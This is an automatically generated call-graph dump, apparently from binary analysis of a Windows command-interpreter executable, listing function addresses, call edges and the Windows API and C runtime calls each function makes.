7ff789bc88a8 16887->17091 16899 7ff789bcbf75 16888->16899 17148 7ff789bc71ec 16888->17148 16889 7ff789bcbf1e 16889->16895 16892 7ff789bcbfa9 16892->16895 16896 7ff789bccd90 166 API calls 16892->16896 16895->16872 16895->16885 16898 7ff789bcbfbb 16896->16898 16898->16895 17154 7ff789bd081c GetEnvironmentVariableW 16898->17154 16901 7ff789bcb0d8 194 API calls 16899->16901 16902 7ff789bcbf7f 16901->16902 16902->16895 16959 7ff789bd5ad8 16902->16959 16907 7ff789bc6e6d 16905->16907 16906 7ff789bc6eb9 16906->16816 16907->16906 16908 7ff789bd5cb4 7 API calls 16907->16908 16908->16907 16910 7ff789bee9b4 197 API calls 16909->16910 16911 7ff789bee925 longjmp 16910->16911 16913 7ff789bc32b0 166 API calls 16912->16913 16914 7ff789bc32a4 16913->16914 16914->16809 16916 7ff789bcca2f 16915->16916 16918 7ff789bcc675 16915->16918 16917 7ff789bdc5fc GetLastError 16916->16917 16920 7ff789bc3278 166 API calls 16916->16920 16921 7ff789bd855c ??_V@YAXPEAX 16916->16921 16917->16916 17175 7ff789bcca40 16918->17175 16920->16916 16921->16916 16922 7ff789bd291c 8 API calls 16946 7ff789bcc762 16922->16946 16923 7ff789bcc9b5 16925 7ff789bd855c ??_V@YAXPEAX 16923->16925 16924 7ff789bd855c ??_V@YAXPEAX 16924->16946 16927 7ff789bcc855 16925->16927 16926 7ff789bcc978 towupper 16951 7ff789bcc964 16926->16951 16931 7ff789bcc872 16927->16931 16935 7ff789bdc6b8 SetConsoleTitleW 16927->16935 16928 7ff789bcc69b 16928->16916 16928->16923 16928->16946 17186 7ff789bcd3f0 16928->17186 17238 7ff789bd855c 16931->17238 16933 7ff789bcc74d 16933->16946 17214 7ff789bcbd38 16933->17214 16935->16931 16937 7ff789bcc8b5 wcsncmp 16937->16933 16937->16946 16940 7ff789bcc83d 17222 7ff789bccb40 16940->17222 16943 7ff789bcc78a wcschr 16943->16946 16945 7ff789bcca25 16948 7ff789bc3278 166 API calls 16945->16948 16946->16916 16946->16922 16946->16924 16946->16940 16946->16943 16946->16945 16949 7ff789bdc684 16946->16949 16946->16951 16952 7ff789bcca2a 16946->16952 16948->16916 16950 7ff789bc3278 166 API calls 16949->16950 16950->16916 16951->16917 16951->16923 16951->16926 16951->16946 16953 7ff789bc89c0 23 API calls 16951->16953 16955 7ff789bcca16 GetLastError 16951->16955 17254 7ff789beec14 memset 16951->17254 17249 7ff789bd9158 RtlCaptureContext RtlLookupFunctionEntry 16952->17249 16953->16951 16957 7ff789bc3278 166 API calls 16955->16957 16958 7ff789bdc675 16957->16958 16958->16916 16960 7ff789bccd90 166 API calls 16959->16960 16961 7ff789bd5b12 16960->16961 16962 7ff789bccb40 166 API calls 16961->16962 16987 7ff789bd5b8b 16961->16987 16964 7ff789bd5b26 16962->16964 16963 7ff789bd8f80 7 API calls 16965 7ff789bcbf99 16963->16965 16966 7ff789bd0a6c 273 API calls 16964->16966 16964->16987 16965->16881 16967 7ff789bd5b43 16966->16967 16968 7ff789bd5bb8 16967->16968 16969 7ff789bd5b48 GetConsoleTitleW 16967->16969 16970 7ff789bd5bf4 16968->16970 16971 7ff789bd5bbd GetConsoleTitleW 16968->16971 16972 7ff789bccad4 172 API calls 16969->16972 16973 7ff789bdf452 16970->16973 16974 7ff789bd5bfd 16970->16974 16976 7ff789bccad4 172 API calls 16971->16976 16975 7ff789bd5b66 16972->16975 16978 7ff789bd3c24 166 API calls 16973->16978 16980 7ff789bdf462 16974->16980 16981 7ff789bd5c1b 16974->16981 16974->16987 17585 7ff789bd4224 InitializeProcThreadAttributeList 16975->17585 16979 7ff789bd5bdb 16976->16979 16978->16987 17645 7ff789bc96e8 16979->17645 16985 7ff789bc3278 166 API calls 16980->16985 16984 7ff789bc3278 166 API calls 16981->16984 16982 7ff789bd5b7f 16986 7ff789bd5c3c SetConsoleTitleW 16982->16986 16984->16987 16985->16987 16986->16987 16987->16963 16989 7ff789bcc01c 16988->16989 17008 7ff789bcc0c4 16988->17008 16990 7ff789bcc086 16989->16990 16991 7ff789bcc022 16989->16991 16993 7ff789bcc144 16990->16993 16997 7ff789bcc094 16990->16997 16992 7ff789bcc030 16991->16992 16995 7ff789bcc113 16991->16995 16994 7ff789bcc039 wcschr 16992->16994 17020 7ff789bcc053 16992->17020 16996 7ff789bcc151 16993->16996 17017 7ff789bcc1c8 16993->17017 16998 7ff789bcc301 16994->16998 16994->17020 17001 7ff789bcff70 2 API calls 16995->17001 16995->17020 18626 7ff789bcc460 16996->18626 17004 7ff789bcc460 183 API calls 16997->17004 16997->17008 17002 7ff789bccd90 166 API calls 16998->17002 16999 7ff789bcc0c6 17005 7ff789bcc0cf wcschr 16999->17005 17012 7ff789bcc073 16999->17012 17000 7ff789bcc058 17010 7ff789bcff70 2 API calls 17000->17010 17000->17012 17001->17020 17025 7ff789bcc30b 17002->17025 17004->16997 17007 7ff789bcc1be 17005->17007 17005->17012 17009 7ff789bccd90 166 API calls 17007->17009 17008->16874 17009->17017 17010->17012 17011 7ff789bcc460 183 API calls 17011->17008 17012->17008 17013 7ff789bcc460 183 API calls 17012->17013 17013->17012 17014 7ff789bcc211 17019 7ff789bcff70 2 API calls 17014->17019 17015 7ff789bcc285 17015->17014 17021 7ff789bcb6b0 170 API calls 17015->17021 17016 7ff789bcb6b0 170 API calls 17016->17020 17017->17008 17017->17014 17017->17015 17022 7ff789bcd840 178 API calls 17017->17022 17018 7ff789bcd840 178 API calls 17018->17025 17019->17008 17020->16999 17020->17000 17020->17014 17023 7ff789bcc2ac 17021->17023 17022->17017 17023->17012 17023->17014 17024 7ff789bcc3d4 17024->17012 17024->17014 17024->17016 17025->17008 17025->17014 17025->17018 17025->17024 17028 7ff789bcafb1 17026->17028 17027 7ff789bcafdb 17027->16895 17028->17027 17029 7ff789bcb038 _dup2 17028->17029 17030 7ff789bcd208 _close 17028->17030 17029->17028 17030->17028 17032 7ff789bcca40 17 API calls 17031->17032 17048 7ff789bcb162 17032->17048 17033 7ff789bcb2e1 17034 7ff789bcb303 17033->17034 17035 7ff789bcb2f7 ??_V@YAXPEAX 17033->17035 17037 7ff789bd8f80 7 API calls 17034->17037 17035->17034 17036 7ff789bcb1d9 17040 7ff789bccd90 166 API calls 17036->17040 17056 7ff789bcb1ed 17036->17056 17039 7ff789bcb315 17037->17039 17038 7ff789bd1ea0 8 API calls 17038->17048 17039->16879 17039->16889 17040->17056 17042 7ff789bdbfef _get_osfhandle SetFilePointer 17044 7ff789bdc01d 17042->17044 17042->17056 17043 7ff789bcb228 _get_osfhandle 17046 7ff789bcb23f _get_osfhandle 17043->17046 17043->17056 17047 7ff789bd33f0 _vsnwprintf 17044->17047 17045 7ff789bcaffc _dup 17045->17056 17046->17056 17050 7ff789bdc038 17047->17050 17048->17033 17048->17036 17048->17038 17048->17048 17049 7ff789bd01b8 6 API calls 17049->17056 17055 7ff789bc3278 166 API calls 17050->17055 17051 7ff789bdc1c3 17052 7ff789bd33f0 _vsnwprintf 17051->17052 17052->17050 17053 7ff789bcd208 _close 17053->17056 17054 7ff789bd26e0 19 API calls 17054->17056 17057 7ff789bdc1f9 17055->17057 17056->17033 17056->17042 17056->17043 17056->17045 17056->17049 17056->17051 17056->17053 17056->17054 17058 7ff789bdc060 17056->17058 17060 7ff789bcb038 _dup2 17056->17060 17061 7ff789bdc246 17056->17061 17066 7ff789bcb356 17056->17066 17090 7ff789bdc1a5 17056->17090 18640 7ff789bef318 _get_osfhandle GetFileType 17056->18640 17059 7ff789bcaf98 2 API calls 17057->17059 17058->17061 17064 7ff789bd09f4 2 API calls 17058->17064 17059->17033 17060->17056 17062 7ff789bcaf98 2 API calls 17061->17062 17065 7ff789bdc24b 17062->17065 17063 7ff789bcb038 _dup2 17067 7ff789bdc1b7 17063->17067 17068 7ff789bdc084 17064->17068 17069 7ff789bef1d8 166 API calls 17065->17069 17074 7ff789bcaf98 2 API calls 17066->17074 17070 7ff789bdc1be 17067->17070 17071 7ff789bdc207 17067->17071 17072 7ff789bcb900 166 API calls 17068->17072 17069->17033 17075 7ff789bcd208 _close 17070->17075 17073 7ff789bcd208 _close 17071->17073 17076 7ff789bdc08c 17072->17076 17073->17066 17078 7ff789bdc211 17074->17078 17075->17051 17077 7ff789bdc094 wcsrchr 17076->17077 17081 7ff789bdc0ad 17076->17081 17077->17081 17079 7ff789bd33f0 _vsnwprintf 17078->17079 17080 7ff789bdc22c 17079->17080 17082 7ff789bc3278 166 API calls 17080->17082 17081->17081 17084 7ff789bdc0e0 _wcsnicmp 17081->17084 17087 7ff789bdc106 17081->17087 17082->17033 17083 7ff789bcff70 2 API calls 17085 7ff789bdc13b 17083->17085 17084->17081 17085->17061 17086 7ff789bdc146 SearchPathW 17085->17086 17086->17061 17088 7ff789bdc188 17086->17088 17087->17083 17089 7ff789bd26e0 19 API calls 17088->17089 17089->17090 17090->17063 17092 7ff789bc88fc 17091->17092 17094 7ff789bc88cf 17091->17094 17092->16888 17095 7ff789bd0a6c 17092->17095 17093 7ff789bc88df _wcsicmp 17093->17094 17094->17092 17094->17093 17096 7ff789bd1ea0 8 API calls 17095->17096 17097 7ff789bd0ab9 17096->17097 17098 7ff789bd0b12 memset 17097->17098 17099 7ff789bd0aee _wcsnicmp 17097->17099 17100 7ff789bdd927 17097->17100 17102 7ff789bd128f ??_V@YAXPEAX 17097->17102 17101 7ff789bcca40 17 API calls 17098->17101 17099->17098 17099->17100 17104 7ff789bd081c 166 API calls 17100->17104 17103 7ff789bd0b5a 17101->17103 17106 7ff789bcb364 17 API calls 17103->17106 17118 7ff789bdd94e 17103->17118 17105 7ff789bdd933 17104->17105 17105->17098 17105->17102 17107 7ff789bd0b6f 17106->17107 17107->17102 17109 7ff789bd0b8c wcschr 17107->17109 17113 7ff789bd0c0f wcsrchr 17107->17113 17116 7ff789bd081c 166 API calls 17107->17116 17107->17118 17122 7ff789bcd3f0 223 API calls 17107->17122 17123 7ff789bd3060 171 API calls 17107->17123 17125 7ff789bd0d71 wcsrchr 17107->17125 17127 7ff789bccd90 166 API calls 17107->17127 17128 7ff789bd1ea0 8 API calls 17107->17128 17130 7ff789bd0fb1 wcsrchr 17107->17130 17131 7ff789bd2eb4 22 API calls 17107->17131 17132 7ff789bd0fd0 wcschr 17107->17132 17135 7ff789bd10fd wcsrchr 17107->17135 17144 7ff789bd1087 _wcsicmp 17107->17144 17146 7ff789bdda74 17107->17146 18641 7ff789bd3bac 17107->18641 18645 7ff789bd291c GetDriveTypeW 17107->18645 18648 7ff789bd2efc 17107->18648 18662 7ff789bcaf74 17107->18662 17108 7ff789bdd96b ??_V@YAXPEAX 17108->17118 17109->17107 17112 7ff789bdd99a wcschr 17112->17118 17113->17107 17113->17118 17114 7ff789bdda64 17115 7ff789bdd9ca GetFileAttributesW 17115->17114 17115->17118 17116->17107 17117 7ff789bdda90 GetFileAttributesW 17117->17118 17119 7ff789bddaa8 GetLastError 17117->17119 17118->17108 17118->17112 17118->17114 17118->17115 17120 7ff789bdd9fd ??_V@YAXPEAX 17118->17120 17119->17114 17121 7ff789bddab9 17119->17121 17120->17118 17121->17118 17122->17107 17123->17107 17125->17107 17126 7ff789bd0d97 NeedCurrentDirectoryForExePathW 17125->17126 17126->17107 17126->17118 17127->17107 17128->17107 17130->17107 17130->17132 17131->17107 17132->17114 17133 7ff789bd0fed wcschr 17132->17133 17133->17107 17133->17114 17135->17107 17136 7ff789bd111a _wcsicmp 17135->17136 17137 7ff789bd123d 17136->17137 17138 7ff789bd1138 _wcsicmp 17136->17138 17140 7ff789bd1250 ??_V@YAXPEAX 17137->17140 17141 7ff789bd1175 17137->17141 17138->17137 17139 7ff789bd10c5 17138->17139 17139->17141 17142 7ff789bd1169 ??_V@YAXPEAX 17139->17142 17140->17141 17143 7ff789bd8f80 7 API calls 17141->17143 17142->17141 17145 7ff789bd1189 17143->17145 17144->17146 17147 7ff789bd10a7 _wcsicmp 17144->17147 17145->16888 17146->17114 17146->17117 17147->17139 17147->17146 17149 7ff789bc7279 17148->17149 17150 7ff789bc7211 _setjmp 17148->17150 17149->16892 17150->17149 17152 7ff789bc7265 17150->17152 18681 7ff789bc72b0 17152->18681 17155 7ff789bd085e 17154->17155 17156 7ff789bd0877 17154->17156 17155->16899 17157 7ff789bd0884 _wcsicmp 17156->17157 17158 7ff789bd0970 17156->17158 17159 7ff789bd08a2 _wcsicmp 17157->17159 17168 7ff789bd0989 17157->17168 17162 7ff789bd3140 154 API calls 17158->17162 17161 7ff789bd08c0 _wcsicmp 17159->17161 17159->17168 17160 7ff789bd417c 154 API calls 17160->17168 17163 7ff789bd08de _wcsicmp 17161->17163 17161->17168 17162->17168 17164 7ff789bdd8d3 GetCommandLineW 17163->17164 17165 7ff789bd08fc _wcsicmp 17163->17165 17172 7ff789bdd8e5 rand 17164->17172 17167 7ff789bd091a _wcsicmp 17165->17167 17165->17168 17166 7ff789bd33f0 _vsnwprintf 17166->17168 17167->17158 17169 7ff789bd0934 _wcsicmp 17167->17169 17168->17160 17168->17166 17170 7ff789bc6ee4 154 API calls 17168->17170 17171 7ff789bd9158 7 API calls 17168->17171 17169->17172 17173 7ff789bd0952 _wcsicmp 17169->17173 17170->17168 17171->17168 17172->17168 17173->17158 17174 7ff789bdd8f9 GetNumaHighestNodeNumber 17173->17174 17174->17168 17176 7ff789bccab8 17175->17176 17177 7ff789bcca59 17175->17177 17176->16928 17275 7ff789bd9324 17177->17275 17180 7ff789bcca84 17183 7ff789bdc706 ??_V@YAXPEAX 17180->17183 17184 7ff789bcca9b memset 17180->17184 17181 7ff789bdc6e0 17279 7ff789be6d1c 17181->17279 17184->17176 17187 7ff789bcd810 17186->17187 17188 7ff789bcd420 17186->17188 17349 7ff789bcb998 17187->17349 17191 7ff789bdcaad 17188->17191 17192 7ff789bcd46e GetProcessHeap HeapAlloc 17188->17192 17190 7ff789bcd515 17198 7ff789bcd544 17190->17198 17194 7ff789bc3278 166 API calls 17191->17194 17192->17191 17193 7ff789bcd49a 17192->17193 17193->17190 17193->17198 17199 7ff789bcd4e8 wcschr 17193->17199 17195 7ff789bdcab7 17194->17195 17196 7ff789bee91c 198 API calls 17196->17198 17197 7ff789bd9158 7 API calls 17197->17198 17198->17191 17198->17196 17198->17197 17200 7ff789bdca31 wcschr 17198->17200 17201 7ff789bcd5ee GetProcessHeap HeapReAlloc 17198->17201 17202 7ff789bcd54a iswspace 17198->17202 17203 7ff789bcd6ff iswspace 17198->17203 17206 7ff789bcd586 wcschr 17198->17206 17208 7ff789bcd668 17198->17208 17209 7ff789bcd759 wcschr 17198->17209 17211 7ff789bcd6c5 wcschr 17198->17211 17212 7ff789bdca5a wcschr 17198->17212 17199->17193 17200->17198 17201->17191 17204 7ff789bcd61d GetProcessHeap HeapSize 17201->17204 17202->17198 17205 7ff789bcd561 wcschr 17202->17205 17203->17198 17207 7ff789bcd712 wcschr 17203->17207 17204->17198 17205->17198 17206->17198 17207->17198 17210 7ff789bd8f80 7 API calls 17208->17210 17209->17198 17213 7ff789bcc741 17210->17213 17211->17198 17212->17198 17213->16933 17213->16937 17215 7ff789bcbd6f 17214->17215 17219 7ff789bcbda2 17214->17219 17215->17219 17378 7ff789beeaf0 17215->17378 17217 7ff789bdc4ab 17217->17219 17383 7ff789bc3240 17217->17383 17219->16946 17220 7ff789bdc4bc 17220->17219 17221 7ff789bc3240 166 API calls 17220->17221 17221->17220 17223 7ff789bccb63 17222->17223 17224 7ff789bccd90 166 API calls 17223->17224 17225 7ff789bcc848 17224->17225 17225->16927 17226 7ff789bccad4 17225->17226 17227 7ff789bccad9 17226->17227 17235 7ff789bccb05 17226->17235 17228 7ff789bccd90 166 API calls 17227->17228 17227->17235 17229 7ff789bdc722 17228->17229 17230 7ff789bdc72e GetConsoleTitleW 17229->17230 17229->17235 17231 7ff789bdc74a 17230->17231 17230->17235 17576 7ff789bcb6b0 17231->17576 17233 7ff789bdc7ec 17234 7ff789bcff70 2 API calls 17233->17234 17234->17235 17235->16927 17236 7ff789bdc7dd SetConsoleTitleW 17236->17233 17237 7ff789bdc778 17237->17233 17237->17236 17239 7ff789bd8574 ??_V@YAXPEAX 17238->17239 17240 7ff789bcc87c 17238->17240 17239->17240 17241 7ff789bd8f80 17240->17241 17244 7ff789bd8f89 17241->17244 17242 7ff789bd8fe0 RtlCaptureContext RtlLookupFunctionEntry 17245 7ff789bd9025 RtlVirtualUnwind 17242->17245 17246 7ff789bd9067 17242->17246 17243 7ff789bcc88e 17243->16881 17244->17242 17244->17243 17245->17246 17583 7ff789bd8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17246->17583 17250 7ff789bd9195 RtlVirtualUnwind 17249->17250 17251 7ff789bd91d7 17249->17251 17250->17251 17584 7ff789bd8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17251->17584 17255 7ff789bcca40 17 API calls 17254->17255 17256 7ff789beec96 17255->17256 17257 7ff789beedf7 17256->17257 17260 7ff789bd081c 166 API calls 17256->17260 17258 7ff789beee16 17257->17258 17259 7ff789beee0a ??_V@YAXPEAX 17257->17259 17261 7ff789bd8f80 7 API calls 17258->17261 17259->17258 17262 7ff789beecca 17260->17262 17265 7ff789beee25 17261->17265 17263 7ff789beecd2 SetCurrentDirectoryW 17262->17263 17264 7ff789beecfb 17262->17264 17266 7ff789beedd4 17263->17266 17267 7ff789beece9 SetErrorMode 17263->17267 17268 7ff789bd498c 8 API calls 17264->17268 17265->16946 17270 7ff789bd417c 166 API calls 17266->17270 17267->17264 17269 7ff789beed89 SetCurrentDirectoryW 17268->17269 17271 7ff789beedc1 17269->17271 17272 7ff789beedac GetLastError 17269->17272 17270->17257 17271->17266 17274 7ff789beedc6 SetErrorMode 17271->17274 17273 7ff789bc3278 166 API calls 17272->17273 17273->17271 17274->17266 17276 7ff789bd9330 17275->17276 17282 7ff789bd9a6c 17276->17282 17278 7ff789bcca7b 17278->17180 17278->17181 17287 7ff789be6c5c 17279->17287 17283 7ff789bd9a86 malloc 17282->17283 17284 7ff789bd9a91 17283->17284 17285 7ff789bd9a77 17283->17285 17284->17278 17285->17283 17286 7ff789bd9a97 Concurrency::cancel_current_task 17285->17286 17286->17278 17290 7ff789be6a34 17287->17290 17291 7ff789be6a41 17290->17291 17298 7ff789be63fc 17291->17298 17293 7ff789be6b1d 17295 7ff789bd8f80 7 API calls 17293->17295 17296 7ff789be6b2e 17295->17296 17296->17176 17299 7ff789be6455 17298->17299 17300 7ff789be6461 17298->17300 17299->17300 17301 7ff789be6c5c 11 API calls 17299->17301 17302 7ff789be64f9 GetCurrentThreadId 17300->17302 17301->17300 17303 7ff789be6561 17302->17303 17304 7ff789be65ea 17303->17304 17305 7ff789be65f5 IsDebuggerPresent 17303->17305 17306 7ff789be666c OutputDebugStringW 17304->17306 17308 7ff789be660b 17304->17308 17313 7ff789be5bf4 17304->17313 17305->17304 17306->17308 17308->17293 17309 7ff789be742c 17308->17309 17310 7ff789be7444 17309->17310 17311 7ff789be744a memset 17309->17311 17310->17311 17312 7ff789be7489 17311->17312 17316 7ff789be5c2e 17313->17316 17339 7ff789be5e13 17313->17339 17314 7ff789bd8f80 7 API calls 17315 7ff789be5e49 17314->17315 17315->17306 17317 7ff789be5ca7 FormatMessageW 17316->17317 17316->17339 17318 7ff789be5d1f 17317->17318 17319 7ff789be5cfc 17317->17319 17320 7ff789be66bc _vsnwprintf 17318->17320 17342 7ff789be66bc 17319->17342 17322 7ff789be5d1d 17320->17322 17323 7ff789be5d54 GetCurrentThreadId 17322->17323 17324 7ff789be66bc _vsnwprintf 17322->17324 17325 7ff789be66bc _vsnwprintf 17323->17325 17326 7ff789be5d51 17324->17326 17327 7ff789be5d91 17325->17327 17326->17323 17328 7ff789be66bc _vsnwprintf 17327->17328 17327->17339 17329 7ff789be5db9 17328->17329 17330 7ff789be5dd4 17329->17330 17332 7ff789be66bc _vsnwprintf 17329->17332 17331 7ff789be5def 17330->17331 17333 7ff789be66bc _vsnwprintf 17330->17333 17334 7ff789be5e15 17331->17334 17335 7ff789be5dff 17331->17335 17332->17330 17333->17331 17337 7ff789be5e2b 17334->17337 17338 7ff789be5e1d 17334->17338 17336 7ff789be66bc _vsnwprintf 17335->17336 17336->17339 17341 7ff789be66bc _vsnwprintf 17337->17341 17340 7ff789be66bc _vsnwprintf 17338->17340 17339->17314 17340->17339 17341->17339 17345 7ff789bd363c 17342->17345 17346 7ff789bd3664 17345->17346 17347 7ff789bd3671 17345->17347 17348 7ff789bd3684 _vsnwprintf 17346->17348 17347->17322 17348->17347 17350 7ff789bccd90 166 API calls 17349->17350 17351 7ff789bcb9a1 17350->17351 17352 7ff789bcb9a6 17351->17352 17353 7ff789bee91c 198 API calls 17351->17353 17352->17190 17354 7ff789bcb9b1 memset 17353->17354 17356 7ff789bcca40 17 API calls 17354->17356 17359 7ff789bcba4c 17356->17359 17357 7ff789bdc3a8 17357->17357 17360 7ff789bcb998 199 API calls 17357->17360 17358 7ff789bcba80 wcschr 17358->17359 17361 7ff789bcbadb 17358->17361 17359->17357 17359->17358 17359->17361 17363 7ff789bcbaa0 wcschr 17359->17363 17365 7ff789bcbb05 17359->17365 17368 7ff789bcbb47 17359->17368 17367 7ff789bdc41a 17360->17367 17361->17357 17362 7ff789bcbcef GetFileAttributesW 17361->17362 17361->17365 17362->17365 17363->17359 17364 7ff789bc88a8 _wcsicmp 17375 7ff789bcbc46 17364->17375 17366 7ff789bcbb29 _wcsicmp 17365->17366 17365->17368 17366->17365 17368->17357 17368->17364 17369 7ff789bcbb6b 17368->17369 17369->17357 17371 7ff789bcbb92 17369->17371 17370 7ff789bcbc82 iswspace 17370->17369 17372 7ff789bcbc99 wcschr 17370->17372 17373 7ff789bcbbe2 ??_V@YAXPEAX 17371->17373 17374 7ff789bcbbee 17371->17374 17372->17369 17372->17375 17373->17374 17376 7ff789bd8f80 7 API calls 17374->17376 17375->17357 17375->17369 17375->17370 17377 7ff789bcbc01 17376->17377 17377->17190 17386 7ff789bc3410 17378->17386 17381 7ff789bcb998 207 API calls 17382 7ff789beeb2e 17381->17382 17382->17217 17403 7ff789bc32b0 17383->17403 17387 7ff789be12cd _ultoa GetACP 17386->17387 17388 7ff789bc345c FormatMessageW 17386->17388 17401 7ff789bd0460 17387->17401 17388->17387 17393 7ff789bc348b 17388->17393 17391 7ff789bc34b4 17394 7ff789bc34c4 FormatMessageW 17391->17394 17395 7ff789be121d GetProcessHeap HeapAlloc 17391->17395 17392 7ff789bc349d wcschr 17392->17391 17392->17393 17393->17391 17393->17392 17396 7ff789bc34ef 17394->17396 17395->17396 17400 7ff789be124f FormatMessageW GetProcessHeap RtlFreeHeap 17395->17400 17397 7ff789bd8f80 7 API calls 17396->17397 17399 7ff789bc34ff 17397->17399 17399->17381 17400->17387 17402 7ff789bd0472 MultiByteToWideChar 17401->17402 17439 7ff789bd3578 _get_osfhandle 17403->17439 17406 7ff789bc331d 17408 7ff789bc3410 18 API calls 17406->17408 17407 7ff789bc32f0 _get_osfhandle GetConsoleScreenBufferInfo 17407->17406 17422 7ff789bc333d 17408->17422 17409 7ff789bc33a8 17411 7ff789bc33b0 17409->17411 17415 7ff789be11ff 17409->17415 17410 7ff789bc3368 WriteConsoleW 17413 7ff789be11cc GetLastError 17410->17413 17410->17422 17417 7ff789bd8f80 7 API calls 17411->17417 17413->17422 17414 7ff789be1057 GetConsoleScreenBufferInfo 17418 7ff789be1079 WriteConsoleW 17414->17418 17414->17422 17454 7ff789bd4c1c 17415->17454 17416 7ff789be11df GetLastError 17416->17409 17423 7ff789bc326c 17417->17423 17418->17422 17424 7ff789be10a8 9 API calls 17418->17424 17421 7ff789bc3400 17421->17416 17422->17409 17422->17410 17422->17413 17422->17414 17422->17416 17422->17421 17446 7ff789bd36ec _get_osfhandle 17422->17446 17423->17220 17424->17422 17425 7ff789be1181 17424->17425 17453 7ff789bebde4 EnterCriticalSection LeaveCriticalSection 17425->17453 17440 7ff789bd3599 GetFileType 17439->17440 17445 7ff789bc32e8 17439->17445 17443 7ff789bd35b1 17440->17443 17440->17445 17441 7ff789bde940 17442 7ff789bd35d2 AcquireSRWLockShared GetConsoleMode ReleaseSRWLockShared 17442->17445 17443->17441 17443->17442 17444 7ff789bd35c3 GetStdHandle 17443->17444 17444->17442 17445->17406 17445->17407 17447 7ff789bde95c WriteFile 17446->17447 17450 7ff789bd3731 17446->17450 17448 7ff789bde980 WideCharToMultiByte WriteFile 17447->17448 17448->17450 17452 7ff789bd37a1 17448->17452 17449 7ff789bd3747 17451 7ff789bd374b WideCharToMultiByte WriteFile 17449->17451 17449->17452 17450->17448 17450->17449 17450->17452 17451->17452 17452->17422 17455 7ff789bd4c24 17454->17455 17457 7ff789bd4c2f exit 17455->17457 17458 7ff789bd4c50 17455->17458 17464 7ff789bd4cb0 17458->17464 17460 7ff789bd4c6c 17460->17455 17465 7ff789bd4cda 17464->17465 17468 7ff789bd4cfa 17464->17468 17466 7ff789bd8f80 7 API calls 17465->17466 17467 7ff789bd4c64 17466->17467 17467->17460 17470 7ff789bd3c24 17467->17470 17468->17465 17469 7ff789bdeefe realloc 17468->17469 17469->17465 17471 7ff789bd3c67 17470->17471 17472 7ff789bcca40 17 API calls 17471->17472 17517 7ff789bd412c 17471->17517 17474 7ff789bd3c94 17472->17474 17473 7ff789bd8f80 7 API calls 17475 7ff789bd413e GetProcessHeap RtlFreeHeap 17473->17475 17476 7ff789bdec97 17474->17476 17535 7ff789bcb900 17474->17535 17475->17460 17477 7ff789bd855c ??_V@YAXPEAX 17476->17477 17479 7ff789bdeca1 17477->17479 17481 7ff789bd3cb8 GetCurrentDirectoryW towupper iswalpha 17483 7ff789bd3fb8 17481->17483 17484 7ff789bd3d68 17481->17484 17486 7ff789bd3fc6 GetLastError 17483->17486 17484->17483 17485 7ff789bd3d72 towupper GetFullPathNameW 17484->17485 17485->17486 17487 7ff789bd3dd3 17485->17487 17488 7ff789bd855c ??_V@YAXPEAX 17486->17488 17489 7ff789bd3fe0 17487->17489 17497 7ff789bd3de3 17487->17497 17488->17489 17491 7ff789bd855c ??_V@YAXPEAX 17489->17491 17490 7ff789bd40fe 17493 7ff789bd855c ??_V@YAXPEAX 17490->17493 17492 7ff789bd3ffb _local_unwind 17491->17492 17494 7ff789bd400c GetLastError 17492->17494 17495 7ff789bd4108 _local_unwind 17493->17495 17498 7ff789bd3e95 17494->17498 17499 7ff789bd4028 17494->17499 17496 7ff789bd3f98 17495->17496 17566 7ff789bcff70 17496->17566 17497->17490 17506 7ff789bd3e66 GetFileAttributesW 17497->17506 17502 7ff789bd3ecf 17498->17502 17539 7ff789bd2978 17498->17539 17499->17498 17501 7ff789bd4031 17499->17501 17507 7ff789bd855c ??_V@YAXPEAX 17501->17507 17504 7ff789bd3ed5 GetFileAttributesW 17502->17504 17505 7ff789bd3f08 17502->17505 17511 7ff789bd3efd 17504->17511 17512 7ff789bd4067 GetLastError 17504->17512 17513 7ff789bd3f1e SetCurrentDirectoryW 17505->17513 17519 7ff789bd3f46 17505->17519 17506->17494 17506->17498 17514 7ff789bd403b _local_unwind 17507->17514 17509 7ff789bd3ec7 17509->17502 17515 7ff789bd404c 17509->17515 17510 7ff789bd855c ??_V@YAXPEAX 17510->17517 17511->17505 17518 7ff789bd409d 17511->17518 17516 7ff789bd855c ??_V@YAXPEAX 17512->17516 17513->17519 17520 7ff789bd40b8 GetLastError 17513->17520 17514->17515 17525 7ff789bd855c ??_V@YAXPEAX 17515->17525 17521 7ff789bd408c _local_unwind 17516->17521 17517->17473 17522 7ff789bd855c ??_V@YAXPEAX 17518->17522 17552 7ff789bd498c 17519->17552 17523 7ff789bd855c ??_V@YAXPEAX 17520->17523 17521->17518 17527 7ff789bd40a7 _local_unwind 17522->17527 17528 7ff789bd40d2 _local_unwind 17523->17528 17526 7ff789bd4056 _local_unwind 17525->17526 17526->17512 17527->17520 17530 7ff789bd40e3 17528->17530 17532 7ff789bd855c ??_V@YAXPEAX 17530->17532 17531 7ff789bd3f6f 17557 7ff789bd417c 17531->17557 17534 7ff789bd40ed _local_unwind 17532->17534 17534->17490 17536 7ff789bcb914 17535->17536 17536->17536 17537 7ff789bccd90 166 API calls 17536->17537 17538 7ff789bcb92a 17537->17538 17538->17476 17538->17481 17543 7ff789bd29b9 17539->17543 17540 7ff789bd2a1e FindFirstFileW 17541 7ff789bd2a44 FindClose 17540->17541 17545 7ff789bde3f7 17540->17545 17541->17543 17542 7ff789bd29ed 17546 7ff789bd8f80 7 API calls 17542->17546 17543->17540 17543->17542 17543->17543 17544 7ff789bd2aeb _wcsnicmp 17543->17544 17543->17545 17548 7ff789bde3d6 _wcsicmp 17543->17548 17549 7ff789bde404 memmove 17543->17549 17550 7ff789bd2a9d memmove 17543->17550 17544->17543 17545->17509 17547 7ff789bd2a02 17546->17547 17547->17509 17548->17543 17548->17545 17549->17545 17550->17543 17553 7ff789bd49ba SetEnvironmentVariableW GetProcessHeap RtlFreeHeap 17552->17553 17555 7ff789bd49a4 17552->17555 17570 7ff789bd4a14 GetEnvironmentStringsW 17553->17570 17555->17553 17558 7ff789bd41d4 towupper 17557->17558 17559 7ff789bd41a8 GetCurrentDirectoryW 17557->17559 17561 7ff789bd081c 163 API calls 17558->17561 17560 7ff789bd41b9 17559->17560 17563 7ff789bd8f80 7 API calls 17560->17563 17562 7ff789bd4204 17561->17562 17562->17560 17564 7ff789bdecac towupper 17562->17564 17565 7ff789bd41c8 17563->17565 17565->17496 17567 7ff789bcff7c 17566->17567 17568 7ff789bcffdb 17566->17568 17567->17568 17569 7ff789bcffb5 GetProcessHeap RtlFreeHeap 